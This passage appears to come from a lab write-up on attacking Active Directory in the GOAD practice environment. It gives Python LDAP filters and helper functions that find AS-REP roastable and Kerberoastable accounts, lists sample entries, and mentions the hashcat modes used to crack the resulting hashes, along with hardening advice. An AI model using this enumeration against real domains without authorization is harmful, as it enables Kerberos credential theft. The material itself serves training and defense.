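    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWD": 0x10000,
    "DONT_REQUIRE_PREAUTH": 0x400000,
}
UF_ACCOUNTDISABLE = UAC_FLAGS["ACCOUNTDISABLE"]
UF_DONT_REQUIRE_PREAUTH = UAC_FLAGS["DONT_REQUIRE_PREAUTH"]

# LDAP_MATCHING_RULE_BIT_AND lets a filter test single bits of an integer
# attribute; the value in the filter must be written in decimal.
BIT_AND = "1.2.840.113556.1.4.803"


def uac_bit(flag, negate=False):
    """Filter clause matching (or, with negate=True, excluding) one userAccountControl bit."""
    clause = f"(userAccountControl:{BIT_AND}:={flag})"
    return f"(!{clause})" if negate else clause


USER_BASE = "(objectCategory=person)(objectClass=user)"  # same base as the ldapsearch above
# Enabled users that do not require Kerberos pre-authentication (AS-REP roastable).
ASREP_FILTER = f"(&{USER_BASE}{uac_bit(UF_DONT_REQUIRE_PREAUTH)}{uac_bit(UF_ACCOUNTDISABLE, negate=True)})"
# Enabled user accounts carrying an SPN, krbtgt aside (Kerberoastable).
KERBEROAST_FILTER = (f"(&{USER_BASE}(servicePrincipalName=*)(!(sAMAccountName=krbtgt))"
                     f"{uac_bit(UF_ACCOUNTDISABLE, negate=True)})")


def decode_uac(value):
    """Names of the flags set in a userAccountControl value."""
    return [name for name, flag in UAC_FLAGS.items() if value & flag]


def _enabled_user(entry):
    # objectCategory=person excludes computer objects, as in the ldapsearch filter
    return entry["objectCategory"] == "person" and not entry["userAccountControl"] & UF_ACCOUNTDISABLE


def asrep_roastable(entries):
    """Python equivalent of ASREP_FILTER over already-fetched entries."""
    return [e["sAMAccountName"] for e in entries
            if _enabled_user(e) and e["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH]


def kerberoastable(entries):
    """Python equivalent of KERBEROAST_FILTER over already-fetched entries."""
    return [e["sAMAccountName"] for e in entries
            if _enabled_user(e) and e["servicePrincipalName"]
            and e["sAMAccountName"].lower() != "krbtgt"]


# Constructed entries for the demo (SPNs and flag combinations are assumptions).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "brandon.stark", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x400000, "servicePrincipalName": []},
    {"sAMAccountName": "hodor", "objectCategory": "person",
     "userAccountControl": 0x200, "servicePrincipalName": []},
    {"sAMAccountName": "jon.snow", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x10000,
     "servicePrincipalName": ["HTTP/example-host.north.sevenkingdoms.local"]},
    {"sAMAccountName": "sql_svc", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x10000,
     "servicePrincipalName": ["MSSQLSvc/example-host.north.sevenkingdoms.local:1433"]},
    # Disabled accounts: the KDC answers KDC_ERR_CLIENT_REVOKED for these,
    # which is what GetNPUsers.py printed for krbtgt and Guest above.
    {"sAMAccountName": "krbtgt", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x2, "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "Guest", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x2 | 0x20 | 0x10000, "servicePrincipalName": []},
    {"sAMAccountName": "legacy.svc", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x2 | 0x400000, "servicePrincipalName": []},
    {"sAMAccountName": "CASTELBLACK$", "objectCategory": "computer",
     "userAccountControl": 0x1000, "servicePrincipalName": ["HOST/castelblack"]},
]

if __name__ == "__main__":
    print("ldapsearch filter (AS-REP):     ", ASREP_FILTER)
    print("ldapsearch filter (Kerberoast): ", KERBEROAST_FILTER)
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ENTRIES))
    print("Kerberoastable:  ", kerberoastable(SAMPLE_ENTRIES))
    print("brandon.stark UAC:", decode_uac(SAMPLE_ENTRIES[0]["userAccountControl"]))
```

The two filter strings can be dropped straight into the ldapsearch command used earlier in place of the `(&(objectCategory=person)(objectClass=user))` filter. On the hardening side, clearing the pre-authentication flag removes the AS-REP case entirely, and service accounts with SPNs should either be gMSAs or carry long random passwords; restricting those accounts to AES via msDS-SupportedEncryptionTypes also takes the etype-23 (RC4) hash formats behind hashcat modes 18200 and 13100 off the table.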

Using BloodHound

Since the BloodHound tool does not support name resolution through the hosts file

Ref.

  • https://xz.aliyun.com/news/11583
  • https://mayfly277.github.io/posts/GOADv2-pwning_part1/
